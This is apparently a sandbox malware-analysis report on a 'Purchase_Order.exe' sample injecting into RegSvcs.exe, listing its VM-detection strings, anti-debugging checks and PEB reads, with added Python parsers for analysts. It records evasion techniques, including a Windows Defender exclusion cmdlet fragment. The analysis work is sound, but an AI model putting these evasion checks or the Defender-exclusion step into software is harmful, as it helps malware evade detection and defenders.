Source: explorer.exe, 00000007.00000000.288044675.0000000008CC6000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000007.00000000.287548556.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000007.00000000.288076974.0000000008CEA000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: vmware
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.278193796.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.263912988.0000000000F73000.00000004.00000020.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000007.00000000.287548556.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000007.00000000.282879554.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information queried: ProcessInformation Jump to behavior
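Several of the Purchase_Order.exe strings above run together with a stray character between them, and in every case that character's code equals the length of the string that follows it: '"' is 34, the length of SOFTWARE\VMware, Inc.\VMware Tools; 'L' is 76, the length of each HARDWARE\DEVICEMAP\Scsi\...\Logical Unit Id 0 path (whose Identifier value names the disk vendor); "'" is 39 for SYSTEM\ControlSet001\Services\Disk\Enum (the disk instance IDs); '%' is 37 for the VMware Tools install path; 'N' is 78 for SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, the display-adapter class key where "VMware SVGA II" would be read; and '!' is 33 for Add-MpPreference -ExclusionPath ", the Windows Defender exclusion cmdlet, ending in an open quote so that a path can presumably be appended at run time. The sample's memory therefore holds a table of length-prefixed strings, and the string extractor merged neighbours whenever the length byte happened to be printable. The Python below is an added example, not part of the report: it recovers the discrete strings, labels each as a registry key, device path, file path, vendor marker or Windows message text, and lists only those attributed to the sample's own process as sandbox-hardening targets. The Hyper-V sentences and the SCSI/STORAGE device paths are kept apart because the report places them in explorer.exe's memory, not the sample's. The label names and the rule set are this example's own.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: "Binary or memory string" lines copied from the report above.
SAMPLE_LINES = r"""
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.287460148.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
"""

LINE_RE = re.compile(
    r"^Source: (?P<proc>[^,]+), (?P<dump>\S+\.sdmp) Binary or memory string: (?P<s>.*)$")

# Classification rules, tried in order; the label names are this example's own.
RULES: List[Tuple[str, re.Pattern]] = [
    ("defender_exclusion", re.compile(r"Add-MpPreference", re.I)),
    ("registry_key", re.compile(r"^(SOFTWARE|HARDWARE|SYSTEM)\\", re.I)),
    ("device_path", re.compile(r"^(\\\\\?\\)?(SCSI|STORAGE)[\\#]", re.I)),
    ("file_path", re.compile(r"^[A-Z]:\\", re.I)),
    ("os_message_text", re.compile(r"Hyper-V .*\.$")),
    ("vendor_marker", re.compile(r"vmware|virtualbox|vbox|qemu", re.I)),
]


def split_length_prefixed(s: str) -> List[str]:
    """Split a run of strings each preceded by a one-byte character count.
    The first string may have lost its (non-printable) length byte, so every
    starting offset is tried until the remainder tiles exactly; a string that
    never tiles is returned whole."""
    def tile(start: int):
        pieces, i = [], start
        while i < len(s):
            n = ord(s[i])
            piece = s[i + 1:i + 1 + n]
            if n == 0 or len(piece) != n:
                return None
            pieces.append(piece)
            i += 1 + n
        return pieces

    for start in range(len(s) + 1):
        pieces = tile(start)
        if pieces is not None:
            return ([s[:start]] if start else []) + pieces
    return [s]


def classify(s: str) -> str:
    for label, rx in RULES:
        if rx.search(s):
            return label
    return "other"


def vm_artifacts(text: str) -> List[Tuple[str, str, str]]:
    """(process, label, string) for every decoded string in the report lines."""
    found = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            for piece in split_length_prefixed(m["s"]):
                found.append((m["proc"], classify(piece), piece))
    return found


def hardening_targets(text: str, sample: str) -> Dict[str, List[str]]:
    """Strings held by the sample's own process, grouped by label: the registry
    keys, paths and vendor names an analysis VM must hide or rename."""
    targets: Dict[str, List[str]] = {}
    for proc, label, s in vm_artifacts(text):
        if proc == sample and label not in ("other", "os_message_text"):
            targets.setdefault(label, []).append(s)
    return targets


if __name__ == "__main__":
    for proc, label, s in vm_artifacts(SAMPLE_LINES):
        print(f"{proc:20} {label:18} {s}")
```

The decoder is a heuristic: it accepts the first offset from which the rest of the string tiles exactly, which is unambiguous for the lines above but could mis-split a string whose characters happen to form valid lengths, so check the recovered pieces against the dump before acting on them.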

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004088B0 rdtsc 4_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00409B20 LdrLoadDll, 4_2_00409B20
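"Process queried: DebugPort" above is the ProcessDebugPort information class of NtQueryInformationProcess, the call CheckRemoteDebuggerPresent wraps, and the rdtsc site is the timing check. Under the next heading, every "mov eax, dword ptr fs:[00000030h]" (or ecx) is a load of the PEB pointer from the TEB on 32-bit Windows, the prelude to reading a PEB field such as BeingDebugged or NtGlobalFlag without calling any API; the report shows only the pointer load, not which field is consulted afterwards. Note the two address ranges: the rdtsc and LdrLoadDll sites sit at 0x0040xxxx, while the PEB reads spread over 0x0127xxxx to 0x0134xxxx, all inside RegSvcs.exe, a legitimate .NET Framework utility that would not itself contain such code. The Python below is an added example, not part of the report: it parses the report's "Code function" and "Process queried" lines (the embedded sample is a subset copied from this section), collapses the repeated lines to distinct function addresses with read counts, groups them by 64 KiB region, and emits a breakpoint list. The tag names are this example's own.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple

# Constructed sample: lines copied from the anti-debugging section of the report.
SAMPLE_LINES = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004088B0 rdtsc 4_2_004088B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00409B20 LdrLoadDll, 4_2_00409B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov ecx, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A513A mov eax, dword ptr fs:[00000030h] 4_2_012A513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h] 4_2_012999BF
"""

# "4_2_01294120": report process index, dump index, function start address.
CODE_RE = re.compile(
    r"^Source: (?P<proc>\S+) Code function: (?P<pidx>\d+)_(?P<didx>\d+)_(?P<addr>[0-9A-Fa-f]{8}) "
    r"(?P<what>.+?),? \d+_\d+_[0-9A-Fa-f]{8}$")
QUERY_RE = re.compile(r"^Source: (?P<proc>\S+) Process queried: (?P<info>\w+)")


class Site(NamedTuple):
    proc: str   # process the report attributes the code to
    pidx: int   # the report's process index (the "4" in 4_2_...)
    addr: int   # function start address
    what: str   # instruction or API the report matched
    tag: str    # this example's own category name


def tag_of(what: str) -> str:
    if "fs:[00000030h]" in what:  # TEB+0x30: pointer to the PEB on 32-bit Windows
        return "peb_read"
    if what.startswith("rdtsc"):
        return "rdtsc_timing"
    if what.startswith("Ldr"):
        return "loader_api"
    return "other"


def parse_sites(text: str) -> List[Site]:
    sites = []
    for line in text.splitlines():
        m = CODE_RE.match(line)
        if m:
            sites.append(Site(m["proc"], int(m["pidx"]), int(m["addr"], 16),
                              m["what"], tag_of(m["what"])))
    return sites


def peb_read_sites(text: str) -> Dict[int, int]:
    """Distinct functions that load the PEB pointer, with the number of loads each."""
    return dict(Counter(s.addr for s in parse_sites(text) if s.tag == "peb_read"))


def regions(text: str, granularity: int = 0x10000) -> Dict[int, Counter]:
    """Sites grouped by 64 KiB region: separates the rdtsc/loader code at
    0x0040xxxx from the PEB-reading code at 0x012xxxxx in the same process."""
    out: Dict[int, Counter] = defaultdict(Counter)
    for s in parse_sites(text):
        out[s.addr & ~(granularity - 1)][s.tag] += 1
    return dict(out)


def debug_port_queries(text: str) -> List[str]:
    """Processes the report saw querying ProcessDebugPort."""
    return [m["proc"] for m in map(QUERY_RE.match, text.splitlines())
            if m and m["info"] == "DebugPort"]


def breakpoints(text: str) -> List[str]:
    """One line per distinct site, sorted by address, ready for a debugger script."""
    seen: Dict[int, str] = {}
    for s in parse_sites(text):
        seen.setdefault(s.addr, s.tag)
    return [f"0x{addr:08X} {tag}" for addr, tag in sorted(seen.items())]


if __name__ == "__main__":
    print("\n".join(breakpoints(SAMPLE_LINES)))
    print(regions(SAMPLE_LINES))
    print(debug_port_queries(SAMPLE_LINES))
```

Fed the whole section, the dozens of PEB lines collapse to a few dozen distinct functions; breaking on those, and on the DebugPort query, is the quickest way to find where the payload reads BeingDebugged or NtGlobalFlag and what it does with the answer.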
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov ecx, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A513A mov eax, dword ptr fs:[00000030h] 4_2_012A513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A513A mov eax, dword ptr fs:[00000030h] 4_2_012A513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279100 mov eax, dword ptr fs:[00000030h] 4_2_01279100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279100 mov eax, dword ptr fs:[00000030h] 4_2_01279100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279100 mov eax, dword ptr fs:[00000030h] 4_2_01279100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127C962 mov eax, dword ptr fs:[00000030h] 4_2_0127C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127B171 mov eax, dword ptr fs:[00000030h] 4_2_0127B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127B171 mov eax, dword ptr fs:[00000030h] 4_2_0127B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129B944 mov eax, dword ptr fs:[00000030h] 4_2_0129B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129B944 mov eax, dword ptr fs:[00000030h] 4_2_0129B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F69A6 mov eax, dword ptr fs:[00000030h] 4_2_012F69A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A61A0 mov eax, dword ptr fs:[00000030h] 4_2_012A61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A61A0 mov eax, dword ptr fs:[00000030h] 4_2_012A61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h] 4_2_012F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h] 4_2_012F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h] 4_2_012F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h] 4_2_012F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h] 4_2_013349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h] 4_2_013349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h] 4_2_013349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h] 4_2_013349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129C182 mov eax, dword ptr fs:[00000030h] 4_2_0129C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AA185 mov eax, dword ptr fs:[00000030h] 4_2_012AA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A2990 mov eax, dword ptr fs:[00000030h] 4_2_012A2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0127B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0127B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0127B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013041E8 mov eax, dword ptr fs:[00000030h] 4_2_013041E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h] 4_2_0128B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h] 4_2_0128B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h] 4_2_0128B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h] 4_2_0128B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h] 4_2_012A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h] 4_2_012A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h] 4_2_012A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h] 4_2_012A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h] 4_2_012A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h] 4_2_0129A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h] 4_2_0129A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h] 4_2_0129A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h] 4_2_0129A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01344015 mov eax, dword ptr fs:[00000030h] 4_2_01344015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01344015 mov eax, dword ptr fs:[00000030h] 4_2_01344015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h] 4_2_012F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h] 4_2_012F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h] 4_2_012F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01332073 mov eax, dword ptr fs:[00000030h] 4_2_01332073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01341074 mov eax, dword ptr fs:[00000030h] 4_2_01341074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01290050 mov eax, dword ptr fs:[00000030h] 4_2_01290050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01290050 mov eax, dword ptr fs:[00000030h] 4_2_01290050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B90AF mov eax, dword ptr fs:[00000030h] 4_2_012B90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h] 4_2_012A20A0
